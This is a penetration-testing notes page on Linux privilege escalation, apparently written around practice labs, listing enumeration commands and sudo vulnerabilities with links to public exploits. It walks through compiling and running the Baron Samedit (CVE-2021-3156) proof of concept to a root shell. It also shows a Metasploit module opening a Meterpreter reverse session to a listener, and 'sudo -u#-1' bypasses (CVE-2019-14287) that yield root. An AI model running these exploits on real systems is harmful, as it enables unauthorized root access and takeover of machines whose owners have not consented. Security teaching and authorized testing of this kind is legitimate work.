> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/services-and-internals-enum.md).

# Services & Internals Enum

## **Network Interfaces**

```shell-session
ip a
```

## **Hosts**

```shell-session
cat /etc/hosts
```

## **User's Last Login**

```shell-session
lastlog

Username         Port     From             Latest
root                                       **Never logged in**
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
...SNIP...
systemd-coredump                           **Never logged in**
mrb3n            pts/1    10.10.14.15      Tue Aug  2 19:33:16 +0000 2022
lxd                                        **Never logged in**
bjones                                     **Never logged in**
administrator.ilfreight                           **Never logged in**
backupsvc                                  **Never logged in**
cliff.moore      pts/0    127.0.0.1        Tue Aug  2 19:32:29 +0000 2022
logger                                     **Never logged in**
shared                                     **Never logged in**
stacey.jenkins   pts/0    10.10.14.15      Tue Aug  2 18:29:15 +0000 2022
htb-student      pts/0    10.10.14.15      Wed Aug  3 13:37:22 +0000 2022             
```

## **Logged In Users**

```shell-session
w

 12:27:21 up 1 day, 16:55,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
cliff.mo pts/0    10.10.14.16      Tue19   40:54m  0.02s  0.02s -bash
```

## **Command History**&#x20;

```shell-session
history

    1  id
    2  cd /home/cliff.moore
    3  exit
    4  touch backup.sh
    5  tail /var/log/apache2/error.log
    6  ssh ec2-user@dmz02.inlanefreight.local
    7  history
```

## **Finding History Files**

```shell-session
find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null
```

## Services listening

```
netstat -tulpn
```

## Cron

```shell-session
ls -la /etc/cron.daily/
```

{% content-ref url="/pages/BzouyNVDBZrvGmfQCMbX" %}
[Cron Job Abuse](/0xss0rz/pentest/privilege-escalation/linux/cron-job-abuse.md)
{% endcontent-ref %}

## Proc

```shell-session
find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"
```

## **Installed Packages**

```shell-session
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
```

## Sudo version

```shell-session
sudo -V
```

```
sudo --version
```

You can check if the sudo version is vulnerable using this grep.

```
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
```

### CVE-2025-32463 – sudo chroot ("chwoot")

Vulnerable builds of **sudo 1.9.14** up to **1.9.17** (all p‑revisions) on most Linux distributions are affected.

{% embed url="<https://github.com/kh4sh3i/CVE-2025-32463>" %}

{% embed url="<https://github.com/pr0v3rbs/CVE-2025-32463_chwoot>" %}

{% embed url="<https://github.com/K3ysTr0K3R/CVE-2025-32463-EXPLOIT>" %}

### Sudo < 1.8.28

{% embed url="<https://www.exploit-db.com/exploits/47502>" %}

### Sudoedit Privesc - CVE 2023-22809

Affected sudo versions: 1.8.0 to 1.9.12p1.

* Poc: <https://github.com/n3m1sys/CVE-2023-22809-sudoedit-privesc>
* Metasploit:

`exploit/linux/local/sudoedit_bypass_priv_esc`

### Baron Samedit - CVE-2021-3156

Versions 1.8.2-1.8.31p2 to 1.9.0-1.9.5p1

* 1.8.31 - Ubuntu 20.04
* 1.8.27 - Debian 10
* 1.9.2 - Fedora 33
* and others

#### Debian 10 (Sudo 1.8.27)

{% embed url="<https://github.com/0xdevil/CVE-2021-3156>" %}

#### Ubuntu 20.04 (Sudo 1.8.31)

{% embed url="<https://github.com/CptGibbon/CVE-2021-3156>" %}

#### Poc All In One

{% embed url="<https://github.com/blasty/CVE-2021-3156>" %}

```shell-session
$ git clone https://github.com/blasty/CVE-2021-3156.git
$ cd CVE-2021-3156
$ make

rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
```

```shell-session
$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
```

```shell-session
$ cat /etc/lsb-release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS"
```

```shell-session
~$ ./sudo-hax-me-a-sandwich 1

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **

# id

uid=0(root) gid=0(root) groups=0(root)
```

* Metasploit exploit:

```
msf6 exploit(linux/local/sudo_baron_samedit) > set session 3
session => 3
msf6 exploit(linux/local/sudo_baron_samedit) > set lhost tun0
lhost => 10.10.16.110
msf6 exploit(linux/local/sudo_baron_samedit) > set lport 443
lport => 443
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 10.10.16.110:443 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: x86
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/D9M8vioM30.py' (763 bytes) ...
[*] Writing '/tmp/libnss_CcyrQ/Q .so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 10.129.203.52
[+] Deleted /tmp/D9M8vioM30.py
[+] Deleted /tmp/libnss_CcyrQ/Q .so.2
[+] Deleted /tmp/libnss_CcyrQ
[*] Meterpreter session 4 opened (10.10.16.110:443 -> 10.129.203.52:50308) at 2024-04-08 08:23:25 -0400

meterpreter > ls
Listing: /tmp
=============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100755/rwxr-xr-x  207   fil   2024-04-08 08:20:01 -0400  cPGjXRBL

meterpreter > getuid
Server username: root
meterpreter > 
```

### CVE-2019-18634 - Sudo before 1.8.26

{% embed url="<https://github.com/saleemrashid/sudo-cve-2019-18634/>" %}

### All versions below 1.8.28 - CVE-2019-14287

{% hint style="info" %}
Requires only a single prerequisite. It had to allow a user in the `/etc/sudoers` file to execute a specific command
{% endhint %}

#### Example 1

```shell-session
$ sudo -l
[sudo] password for cry0l1t3: **********

User cry0l1t3 may run the following commands on Penny:
    ALL=(ALL) /usr/bin/id
```

```shell-session
$ sudo -u#-1 id

root@nix02:/home/cry0l1t3# id

uid=0(root) gid=1005(cry0l1t3) groups=1005(cry0l1t3)
```

#### Example 2

```
$ sudo -l 
Matching Defaults entries for htb-student on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on ubuntu:
    (ALL, !root) /bin/ncdu
```

```
$ sudo -u#-1 /bin/ncdu
```

Type the “b” letter on your keybord to open a new shell terminal on the system

```
$ sudo -u#-1 /bin/ncdu
# id
uid=0(root) gid=1001(htb-student) groups=1001(htb-student)
# 

```

#### Example 3

```
sudo -l
Password: 
Matching Defaults entries for user on XXX-NIX04:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User ben may run the following commands on XXX-NIX04:
    (ALL, !root) /bin/bash
```

```
$ sudo -u#-1 /bin/bash
root@XXX-NIX04:/home/user# 
```

{% embed url="<https://github.com/nu11secur1ty/Linux_hardening_and_security/blob/master/Sudo/README.MD>" %}

#### Example 4 - iptable and iptable-save

{% embed url="<https://www.shielder.com/blog/2024/09/a-journey-from-sudo-iptables-to-local-privilege-escalation/>" %}

### **More exploits**

{% embed url="<https://0xss0rz.github.io/2021-05-11-THM-Sudo-Vulns/>" %}

* Sudo Buffer Overflow (CVE-2019-18634, version < 1.8.26)
* Sudo Security Bypass (CVE-2019-14287, version < 1.8.28)

## Binaries

```shell-session
ls -l /bin /usr/bin/ /usr/sbin/
```

{% content-ref url="/pages/1Q09QuETABcEe9nluDX9" %}
[Vulnerable Services](/0xss0rz/pentest/privilege-escalation/linux/vulnerable-services.md)
{% endcontent-ref %}

### GTFOBins

```shell-session
for i in $(curl -s https://gtfobins.github.io/ | html2text | cut -d" " -f1 | sed '/^[[:space:]]*$/d');do if grep -q "$i" installed_pkgs.list;then echo "Check GTFO for: $i";fi;done
```

{% content-ref url="/pages/2oHBze94GoM9vStxNadE" %}
[SUID/SGID](/0xss0rz/pentest/privilege-escalation/linux/suid-sgid.md)
{% endcontent-ref %}

## **Trace System Calls**

```shell-session
strace ping -c1 10.129.112.20
```

## Configuration files

```shell-session
find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null
```

{% content-ref url="/pages/M8xfb0EXOCusqyJ270XP" %}
[Credentials Hunting](/0xss0rz/pentest/privilege-escalation/linux/credentials-hunting.md)
{% endcontent-ref %}

## Scripts

```shell-session
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"
```

## **Running Services by User**

```shell-session
ps aux | grep root
```

<br>
